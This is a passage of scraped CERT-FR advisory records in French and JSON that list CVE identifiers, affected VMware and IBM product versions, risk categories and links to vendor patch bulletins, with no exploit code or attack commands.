"url": "https://www.cve.org/CVERecord?id=CVE-2019-13136"
},
{
"name": "CVE-2025-49014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49014"
},
{
"name": "CVE-2021-36222",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36222"
},
{
"name": "CVE-2021-3941",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3941"
},
{
"name": "CVE-2022-0561",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0561"
},
{
"name": "CVE-2024-6923",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6923"
},
{
"name": "CVE-2025-21811",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21811"
},
{
"name": "CVE-2024-8088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
},
{
"name": "CVE-2025-11226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11226"
}
],
"initial_release_date": "2025-11-06T00:00:00",
"last_revision_date": "2025-11-06T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0969",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-11-06T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36320",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36320"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36423",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36423"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2022-19",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36364"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36351"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36424",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36424"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36412",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36412"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36388",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36388"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36426",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36426"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36411",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36411"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36357",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36357"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36408",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36408"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36349",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36349"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36414",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36414"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36397",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36397"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36389",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36389"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36398",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36398"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36380",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36380"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-41",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36407"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36362",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36362"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36413",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36413"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36384",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36384"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36379",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36379"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36400",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36400"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36377",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36377"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36368",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36368"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36418",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36418"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36420",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36420"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36391",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36391"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36392",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36392"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36353",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36353"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-14",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36356"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36422",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36422"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36381",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36381"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36421",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36421"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36416",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36416"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-86",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36415"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36403",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36403"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36347",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36347"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36383",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36383"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36410",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36410"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36352",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36352"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36394",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36394"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36354",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36354"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36399",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36399"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36350"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36419",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36419"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-85",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36401"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2022-19",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36365"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36405",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36405"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2018-27",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36367"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36395",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36395"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36387",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36387"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36363",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36363"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36385",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36385"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36409",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36409"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36359"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36348",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36348"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36386",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36386"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36417",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36417"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36425",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36425"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2018-27",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36366"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-44",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36360"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36355",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36355"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36358"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36396",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36396"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36378",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36378"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36382",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36382"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36404",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36404"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-44",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36361"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36402",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36402"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36393",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36393"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36406",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36406"
},
{
"published_at": "2025-11-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36390",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36390"
}
]
}
CERTFR-2024-AVI-1030
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans IBM QRadar. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar User Behavior Analytics versions 1.x \u00e0 4.1.x ant\u00e9rieures \u00e0 4.1.17",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-47831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47831"
},
{
"name": "CVE-2018-14040",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14040"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2018-20676",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20676"
},
{
"name": "CVE-2024-1135",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1135"
},
{
"name": "CVE-2018-20677",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20677"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2018-14041",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14041"
},
{
"name": "CVE-2016-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10735"
},
{
"name": "CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2024-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39689"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-8331",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8331"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-1030",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-11-29T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans IBM QRadar. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans IBM QRadar",
"vendor_advisories": [
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176642",
"url": "https://www.ibm.com/support/pages/node/7176642"
}
]
}
CERTFR-2025-AVI-0045
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar Log Source Management App | QRadar Log Source Management App versions antérieures à 7.0.11 | ||
| IBM | Db2 Query Management Facility | DB2 Query Management Facility versions 13.1.1 et 13.1.2 sans la dernière version du JRE |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar Log Source Management App versions ant\u00e9rieures \u00e0 7.0.11",
"product": {
"name": "QRadar Log Source Management App",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Query Management Facility versions 13.1.1 et 13.1.2 sans la derni\u00e8re version du JRE",
"product": {
"name": "Db2 Query Management Facility",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-42459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42459"
},
{
"name": "CVE-2024-21536",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21536"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-42460",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42460"
},
{
"name": "CVE-2024-22361",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22361"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2024-33883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33883"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2024-48949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48949"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2024-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37890"
},
{
"name": "CVE-2023-5676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5676"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2024-47068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47068"
},
{
"name": "CVE-2024-20932",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20932"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2024-42461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42461"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0045",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-01-17T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-01-13",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7180895",
"url": "https://www.ibm.com/support/pages/node/7180895"
},
{
"published_at": "2025-01-13",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7180894",
"url": "https://www.ibm.com/support/pages/node/7180894"
},
{
"published_at": "2025-01-10",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7180725",
"url": "https://www.ibm.com/support/pages/node/7180725"
}
]
}
CERTFR-2024-AVI-1015
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Les vulnérabilités CVE-2024-47875 et CVE-2024-45801 n'ont pas de correctif pour Sterling Connect:Direct Web Services versions 6.1.x et 6.2.x
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar | QRadar Pre-Validation App versions antérieures à 2.0.1 | ||
| IBM | QRadar | QRadar Pulse App versions antérieures à 2.2.15 | ||
| IBM | WebSphere | WebSphere Hybrid Edition sans le correctif APAR PH63533 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.2.x antérieures à 6.2.0.25 | ||
| IBM | AIX | AIX version 7.3 sans le correctif bind_fix27/73bind918.tar | ||
| IBM | VIOS | VIOS version 3.1 sans le correctif bind_fix27/72bind918.tar | ||
| IBM | WebSphere | WebSphere Application Server Liberty sans le correctif APAR PH63533 | ||
| IBM | Cloud Pak System | Cloud Pak System versions antérieures à 2.3.5.0 pour Power avec le correctif PH60195/PH61002 | ||
| IBM | AIX | AIX version 7.2 sans le correctif bind_fix27/72bind918.tar | ||
| IBM | VIOS | VIOS version 4.1 sans le correctif bind_fix27/73bind918.tar | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.1.x antérieures à 6.1.0.26 | ||
| IBM | Cloud Pak System | Cloud Pak System versions antérieures à 2.3.4.1 pour Intel avec le correctif PH60195/PH61002 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.3.x antérieures à 6.3.0.11 | ||
| IBM | QRadar | QRadar User Behavior Analytics versions antérieures à 4.1.17 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar Pre-Validation App versions ant\u00e9rieures \u00e0 2.0.1",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Pulse App versions ant\u00e9rieures \u00e0 2.2.15",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition sans le correctif APAR PH63533",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
